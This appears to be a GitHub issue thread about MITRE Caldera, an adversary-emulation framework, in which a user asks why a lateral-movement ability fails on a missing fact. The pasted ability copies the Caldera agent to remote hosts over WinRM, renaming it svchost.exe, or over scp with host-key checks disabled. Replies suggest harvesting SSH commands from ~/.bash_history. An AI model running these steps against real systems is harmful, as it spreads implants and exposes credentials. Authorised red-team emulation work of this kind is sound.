### ISSUE TITLE
Lateral Movement copying 54ndc47

### ISSUE THREAD

**Issue by perra22** [mitre/caldera#860]
Hi, i'm trying to do lateral movement with this ability on linux:
```
---

- id: 4908fdc4-74fc-4d7c-8935-26d11ad26a8d
  name: Copy 54ndc47 (WinRM and SCP)
  description: Copy 54ndc47 to remote host (powershell 5 or newer only) or SCP
  tactic: lateral-movement
  technique:
    attack_id: T1105
    name: Remote File Copy
  platforms:
    windows:
      psh,pwsh:
        command: |
          $job = Start-Job -ScriptBlock {
            $username = "#{domain.user.name}";
            $password = "#{domain.user.password}";
            $secstr = New-Object -TypeName System.Security.SecureString;
            $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
            $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
            $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
            Copy-Item -Path "sandcat.go-windows" -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
            Start-Sleep -s 5;
            Remove-PSSession -Session $session;
          };
          Receive-Job -Job $job -Wait;
        payload: sandcat.go-windows
    darwin:
      sh:
        command: |
          scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~
        cleanup: |
          ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'rm sandcat.go-linux'
        payload: sandcat.go
    linux:
      sh:
        command: |
          scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~ &&
        cleanup: |
          ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'rm sandcat.go-linux'
        payload: sandcat.go

```
i've combined it with some discovery abilities but it doesn't work because 

> "Fact dependency not fulfilled"

 i suppose that is due to the variable `#{remote.ssh.cmd}`. How can i do it? How can i fullfill variables with facts that aren't preloaded before the operation starts? Do i need to create an ability that parse a new fact called as the variable?

**Comment by wbooth** [comment]
You can provide it in a fact source. take a look at the data/facts directory in stockpile for an example. I’ll post a snippet when I’m near a computer

**Comment by privateducky** [comment]
following up on what @wbooth wrote:

you should add a fact into the pre-seeded fact source, located in plugins/stockpile/data/facts/ed32b9c3-9593-4c33-b0db-e2007315096b.yml.

**Comment by perra22** [comment]
Ok thanks,
but if i wanted to do it dynamically? Without create a pre-seeded fact and letting Caldera learn from other abilities and fills the variable? Is it possible?

**Comment by privateducky** [comment]
Yes - you can do it dynamically as well. Here's how:

1) Either locate an existing ability - or write a new one - which would collect a remote.ssh.cmd. I would recommend ability = 422526ec-27e9-429a-995b-c686a29561a4. This ability collects the contents of the ~/.bash_history file.
2) Write a "parser" to parse the output of the ability and pull out remote.ssh.cmd's. Take a look at this doc page for a good overview: https://github.com/mitre/caldera/wiki/How-CALDERA-makes-decisions

**Comment by perra22** [comment]
Thank you!
